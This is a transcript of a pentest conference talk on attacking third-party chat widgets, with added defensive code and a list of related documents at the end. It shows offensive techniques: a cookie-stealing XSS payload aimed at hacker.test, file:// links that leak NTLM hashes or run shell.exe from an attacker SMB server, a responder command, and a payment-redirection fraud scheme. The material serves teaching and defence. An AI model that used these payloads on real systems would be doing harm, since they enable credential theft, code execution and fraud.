Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
- Amanda Foster
- 6 years ago
Transcription
1 Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
2 $ whoarewe: Egor Karbutov & Alexey Pertsev. Penetration testers, security speakers, bug hunters.
3 Agenda
- Chats, chats, chats
- How does it work?
- ZIP: old tricks
- RCE via ZIP
- So much XSS
- Electron vulnerability
- Scheme file:// for your chats
- Payment through chats
- Mobile application chats
4 Disclaimer: chat images are taken as examples. All coincidences are accidental.
5 Chats, chats, chats. What are you talking about? Another chat?
8 Chat types: browsers, CMS, desktop applications, social networks, mobile SDKs.
9 Does it help us? Pentest! It increases the attack surface:
- Social engineering attacks
- Vulnerabilities in the client's own implementation
- Vendor vulnerabilities
- User support sits on the local network
- Lack of (network) segmentation
10 Chat for browsers. How does it work? JavaScript; CMS = JS.
11 JavaScript "privileges": XMLHttpRequest; control of user data (cookies, tokens, sensitive information); HTML replacement; remote update.
12 Services
13 Files. Social engineering attacks? Will you send an EXE file? We can use a couple of stupid tricks with ZIP.
14 ZIP bomb from 2014 :) 42 KB: 24 GB? 322 GB? 132 TB? 4.5 PB
15 ZIP format
16 ZIP traversal
17 Let's send a file. Components: user interface, api.servise.test, storage.servise.test, operator standalone program.
- The user sends cat.png; storage.servise.test stores it under an id (cat.png == id).
- api.servise.test delivers a File Message to the operator program with file_path = /file/id.
- The operator program builds the download URL by concatenation: Concat(file_path).
- Download: GET /file/id HTTP/1.1, Host: storage.service.test.
- The file lands in %Downloads%/cat.png.
18 RCE via File. Same flow, but the attacker controls file_path in the File Message:
- The attacker sends cat.png, then a File Message with file_path = .hacker.site/file/id (or .hacker.test/file/id).
- The operator program concatenates without validation: Concat(file_path) gives the host storage.servise.test.hacke.site, which the attacker owns.
- On the attacker's server the id is ../../../../../../../shell.exe.
- Download: GET /file/id HTTP/1.1, Host: storage.service.test.hacke.site.
- The file lands in %Downloads%/shell.exe.
19 XSS. XSS is the maximum impact. The messages themselves are well protected, so look in non-obvious places: headers, and GET/POST parameters used for analytics. Our target is the admin page or the statistics page.
20 Headers for XSS: User-Agent, Referer, Cookie, Origin, custom headers.
21 Parameters for XSS. Methods: GET, POST, WebSocket. Keep it simple: use grey-box analysis!
22 Admin & statistics page: wait for someone to visit the page, or abuse the complaint function to make administrators open it.
23 The sad consequences: XSS in the chat settings (appearance customisation: fonts, labels, colour, image, etc.).
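Slides 19 to 23 name two sinks: the admin/statistics page, which prints visitor-controlled headers and analytics parameters, and the chat settings, whose fonts, colours and labels are pushed into every client's page. The block below is an added example, not the vendor's code: the statistics table as it is usually written and as it should be, and settings handling that validates typed values and encodes free text. Node.js; the visit records and settings are constructed.

```javascript
// Added example, not the vendor's code: the two XSS sinks from slides 19-23.
// Node.js; the visit records and settings are constructed.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// Constructed analytics records: User-Agent, Referer and a page parameter, all
// chosen by the visitor, one of them carrying a payload.
const visits = [
  { ua: 'Mozilla/5.0 (X11; Linux x86_64)', referer: 'https://pentest_client.shop.test/cart', page: '/checkout' },
  { ua: '<script>fetch("https://hacker.test/?c="+document.cookie)</script>',
    referer: '"><img src=x onerror=alert(document.domain)>', page: '/' },
];

// Statistics table as it is often written: template literal, no encoding.
function renderStatsVulnerable(rows) {
  return rows.map(r => `<tr><td>${r.ua}</td><td>${r.referer}</td><td>${r.page}</td></tr>`).join('\n');
}

// Same table with every visitor-controlled value encoded for an HTML text context.
function renderStats(rows) {
  return rows.map(r =>
    `<tr><td>${escapeHtml(r.ua)}</td><td>${escapeHtml(r.referer)}</td><td>${escapeHtml(r.page)}</td></tr>`
  ).join('\n');
}

// Appearance settings end up inside <style> and in the widget markup on every
// site that embeds the chat. Values with a type are validated against it (a bad
// colour falls back, it is never "escaped" into CSS); free text is encoded.
const FONTS = new Set(['Arial', 'Helvetica', 'Roboto', 'sans-serif']);
const COLOR = /^#[0-9a-fA-F]{6}$/;

function widgetStyle(settings) {
  const font = FONTS.has(settings.font) ? settings.font : 'sans-serif';
  const color = COLOR.test(settings.color) ? settings.color : '#000000';
  return `.chat-widget{font-family:${font};color:${color}}`;
}

function widgetLabel(settings) {
  return `<span class="chat-label">${escapeHtml(settings.label)}</span>`;
}
```

`renderStatsVulnerable(visits)` hands the admin's browser a live `<script>` tag from a User-Agent header; `renderStats(visits)` shows the same text harmlessly. The settings functions matter more than they look: a payload stored there is served to every client site (slide 24's last step), so a CSP on the admin pages does nothing for the customers' sites and the value has to be rejected at write time.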
24 Attack scheme 1
- Evil Hacker: XSS attack on the chat at pentest_client.shop.test.
- XSS attack on the client's admins via statistic_vendor.chat.test / admin_vendor.chat.test.
- JS code injection into the chat settings.
- XSS from any user on the site pentest_client.shop.test.
25 Attack scheme 2
- Evil Hacker: XSS attack on the chat at chat.vendor.
- XSS attack on the vendor's admins via statistic.chat.vendor / admin.chat.vendor.
- JS code injection into the chat settings.
- XSS from any user on the site chat.vendor.
- XSS from any user on chat clients: all the chat clients' services (chat.test, statistic_vendor.chat.test, admin_vendor.chat.test).
26 Electron: open-source framework to build desktop apps using HTML, CSS and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime. Chat vendors use Electron for their admin desktop applications.
27 Electron threat model. Electron threat model = browser threat model, plus: untrusted content from the web; SOP bypass; control over whether JavaScript may access Node.js primitives; potential access to Node.js primitives; limited sandbox. XSS == RCE.
28 Electron sandbox bypass: nodeIntegration = true.
29 Electron sandbox bypass: nodeIntegration = true is a misconfiguration; SOP bypass via the presence of privileged URLs. Switch it to false.
30 file://: typically used to retrieve files from networks and local disks. Vulnerabilities in the wild: local file inclusion, XXE, SSRF. Windows context: NTLM hash stealing, NTLM relay, RCE.
31 Chats with file://: admin desktop application for Windows; the file:// scheme is available; a file:// link is rendered as a hyperlink.
32 Chats with file://, pentest in the local network. RCE on client devices and servers; weak and duplicate passwords (local services, servers, client devices). Flow: the hacker sends a file:// link (file://hacker.test/) through pentest_client.shop.test; the admin desktop application sends the NTLM hash to the hacker's SMB server; hash cracking or SMB relay.
33 Tricks with file:// (1). What can we do? file:// with local files: file://c:/windows/system32/calc.exe. But we can't pass arguments: file://c:/windows/system32/cmd.exe /C calc does not work, because every symbol in the file link is treated as part of the path. So on its own this is only for social engineering attacks. You can combine it with the dir traversal ZIP trick.
34 Tricks with file:// (2). file:// with executables from the Internet (hacker's SMB server): file://internet_ip/pwn.exe
35 Chats with file://, pentest of an Internet service and the local network. RCE on the client device; social engineering attacks + file://local_files. Flow: the hacker sends a file:// link to an executable (file://hacker.test/shell.exe) through pentest_client.shop.test; the admin clicks the link in the admin desktop application; shell.exe is downloaded from the hacker's SMB server; shell.exe executes on the admin's OS.
36 Tricks with file:// (3). How to bypass the Windows alert window "This file is in a location outside your local network"? Easy, I'll use local addresses. No, that doesn't work.
37 From the Windows point of view, the local network consists of servers with a NetBIOS name, and a NetBIOS name is a domain name without a dot. If I use a NetBIOS name (netbios) instead of a local IP, I can bypass that alert: file://netbios/pwn.exe. How? An smbd (Samba) server + responder -d netbios -I eth0. Works only in local networks.
38 Chats with file://, NetBIOS name trick in the local network, without the alert window. Flow: the hacker sends file://netbios/pwn.exe through pentest_client.shop.test; the admin clicks the link in the admin desktop application; shell.exe is downloaded from the hacker's SMB server; shell.exe executes on the admin's OS.
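The Electron slides (26 to 29) and the file:// slides (30 to 38) describe the same admin desktop application from two sides: with nodeIntegration on, an XSS in it is code execution, and with file:// links handed straight to the OS, a single click sends an NTLM hash or runs pwn.exe. The block below is an added example, not the vendor's code, covering both: hardened webPreferences, and a scheme allowlist applied to every navigation and every link the app opens externally. Node.js; the URL guards run anywhere, the Electron wiring only inside Electron, and the vendor origins and window options are stand-ins.

```javascript
// Added example, not the vendor's code: an Electron admin app that (a) drops the
// nodeIntegration misconfiguration from slides 28-29 and (b) never lets a
// file:// or \\host\share link from a chat message reach the OS (slides 32-38).
// Node.js; the URL guards run in plain Node, the Electron wiring only inside
// Electron. Origins and window options are stand-ins.
function hardenedWebPreferences() {
  return {
    nodeIntegration: false,       // renderer JS gets no require()/process: XSS != RCE
    contextIsolation: true,       // preload and page scripts do not share a world
    sandbox: true,                // Chromium OS sandbox for the renderer process
    webSecurity: true,            // keep the same-origin policy on
    allowRunningInsecureContent: false,
  };
}

// Only http(s) may leave the app. file:, smb:, UNC paths and custom schemes are
// refused, so a clicked "file://netbios/pwn.exe" never triggers an SMB connection.
function allowedExternal(raw) {
  let u;
  try { u = new URL(raw); } catch { return false; }   // \\netbios\share is not a URL
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return false;
  if (u.username || u.password) return false;         // https://user:pass@host tricks
  return true;
}

// Navigation inside the app window stays on the vendor's own origins (assumed names).
const APP_ORIGINS = new Set(['https://admin.chat.vendor', 'https://statistic.chat.vendor']);
function allowedNavigation(raw) {
  try { return APP_ORIGINS.has(new URL(raw).origin); } catch { return false; }
}

// Wiring, applied to every WebContents the app creates (only inside Electron;
// in plain Node require('electron') throws or returns a path string).
let electron = null;
try { electron = require('electron'); } catch { /* plain Node: nothing to wire */ }
if (electron && electron.app) {
  const { app, BrowserWindow, shell } = electron;
  app.on('web-contents-created', (_event, contents) => {
    contents.on('will-navigate', (event, url) => {
      if (!allowedNavigation(url)) event.preventDefault();
    });
    contents.setWindowOpenHandler(({ url }) => {
      if (allowedExternal(url)) shell.openExternal(url);
      return { action: 'deny' };                // never open a second window ourselves
    });
  });
  app.whenReady().then(() => {
    const win = new BrowserWindow({ webPreferences: hardenedWebPreferences() });
    win.loadURL('https://admin.chat.vendor/');
  });
}
```

`allowedExternal` refuses every form the slides use (`file://hacker.test/shell.exe`, `file://netbios/pwn.exe`, `file:///c:/windows/system32/calc.exe`, a bare UNC path) and passes plain https links to `shell.openExternal`. Note the order of defences: the scheme allowlist stops the NTLM leak and the download on slides 32 to 38 even when the chat markup is otherwise fine, while the webPreferences limit what an XSS in the page can do if one gets through anyway.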
39 Add a payment system. Useful? Be careful where you store the configs!
40 Hacker can buy an iPhone for free. The shop backend takes POST /pay?params=1 with shopid, customer, sum and item and redirects the customer to the payment page; the payment system then confirms the order through the shop's checkurl (answer: YES) and reports the payment through avisourl. If the Evil Hacker controls the shopid and can call checkurl and avisourl himself, he walks away with the iPhone X.
41 Stealing money for hackers. POST /pay?params=1 (shopid, customer, sum, item). Steps to take profit:
- Register your own shop with a similar name
- Change the shopid via XSS
- Call checkurl and avisourl as needed
- All payments go to the hacker!
Protection:
- Check Yandex IPs
- Add an anti-CSRF token to the config form
- DO NOT SHOW ANY PASSWORDS EVER
42 Mobile application SDK: custom code inside native applications. All code in the app runs with the same single set of privileges in the mobile OS, so 3rd-party SDKs have full access inside your app: change the user interface; access local files in the app folder; access dynamic user data; change the app logic (like tapjacking). Vulnerabilities: custom implementations; WebView JS manipulation (Android).
43 ExpensiveWall. ExpensiveWall is spread to different apps as an SDK called gtk. ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers such as MAC and IP addresses, IMSI and IMEI. Total downloads of infected applications = 5,904,
44 Don't forget about: farms that inflate application ratings; dynamic code execution and code updates (JSPatch on iOS, Android runtime); valid ads that were vulnerable; applications with a fake (ad) SDK; code review of custom SDK code.
45 Conclusion. For pentest and red team: increase your attack surface via 3rd-party services and program libraries. For you and your project: think about how much you trust other people's implementations, the applications on your devices, and the plugins in your program. Don't forget about code review! All vulnerabilities were reported and fixed.
Questions? Egor Karbutov and Alexey Pertsev
CANVAS by Instructure Bugcrowd Flex Program Results December 01 Executive Summary Bugcrowd Inc was engaged by Instructure to perform a Flex Bounty program, commonly known as a crowdsourced penetration
More informationHybrid App Security Attack and Defense
标题文本» 正文级别 1 正文级别 2 正文级别 3 正文级别 4» 正文级别 5 Hybrid App Security Attack and Defense HuiYu Wu @ Tencent Security Platform Department About Me Security researcher at Tencent Security Platform Department Focus
More informationOWASP Top David Caissy OWASP Los Angeles Chapter July 2017
OWASP Top 10-2017 David Caissy OWASP Los Angeles Chapter July 2017 About Me David Caissy Web App Penetration Tester Former Java Application Architect IT Security Trainer: Developers Penetration Testers
More informationSECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS
SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS Contents Introduction...3 1. Research Methodology...4 2. Executive Summary...5 3. Participant Portrait...6 4. Vulnerability Statistics...8 4.1.
More informationSichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
More informationExploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
More informationApplication. Security. on line training. Academy. by Appsec Labs
Application Security on line training Academy by Appsec Labs APPSEC LABS ACADEMY APPLICATION SECURITY & SECURE CODING ON LINE TRAINING PROGRAM AppSec Labs is an expert application security company serving
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationCNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies
CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
More informationCurso: Ethical Hacking and Countermeasures
Curso: Ethical Hacking and Countermeasures Module 1: Introduction to Ethical Hacking Who is a Hacker? Essential Terminologies Effects of Hacking Effects of Hacking on Business Elements of Information Security
More informationThe Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else
The Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else Paula Januszkiewicz CQURE: CEO, Penetration Tester CQURE Offices: New York, Dubai, Warsaw MVP: Enterprise Security,
More informationQuick Heal AntiVirus Pro Advanced. Protects your computer from viruses, malware, and Internet threats.
AntiVirus Pro Advanced Protects your computer from viruses, malware, and Internet threats. Features List Ransomware Protection anti-ransomware feature is more effective and advanced than other anti-ransomware
More informationVendor: Microsoft. Exam Code: Exam Name: MTA Security Fundamentals Practice Test. Version: Demo
Vendor: Microsoft Exam Code: 98-367 Exam Name: MTA Security Fundamentals Practice Test Version: Demo DEMO QUESTION 1 To prevent users from copying data to removable media, you should: A. Lock the computer
More informationSecurity in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren
Security in a Mainframe Emulator Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren October 25, 2017 Table of Contents Introduction... 2 About this paper...
More informationWhy bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?
Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationCOPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51
Acknowledgments Introduction Part I: The Basics in Depth 1 Chapter 1: Windows Attacks 3 Attack Classes 3 Automated versus Dedicated Attacker 4 Remote versus Local 7 Types of Attacks 8 Dedicated Manual
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationRBS NetGain Enterprise Manager Multiple Vulnerabilities of 11
RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationCross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft
Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft Who are we? Chris Evans Troublemaker, Engineer, Tech Lead, Google Security Team
More informationBecoming the Adversary
SESSION ID: CIN-R06 Becoming the Adversary Tyrone Erasmus Managing Security Consultant MWR InfoSecurity @metall0id /usr/bin/whoami Most public research == Android Something different today 2 Overview Introduction
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationWeb security: an introduction to attack techniques and defense methods
Web security: an introduction to attack techniques and defense methods Mauro Gentile Web Application Security (Elective in Computer Networks) F. d'amore Dept. of Computer, Control, and Management Engineering
More information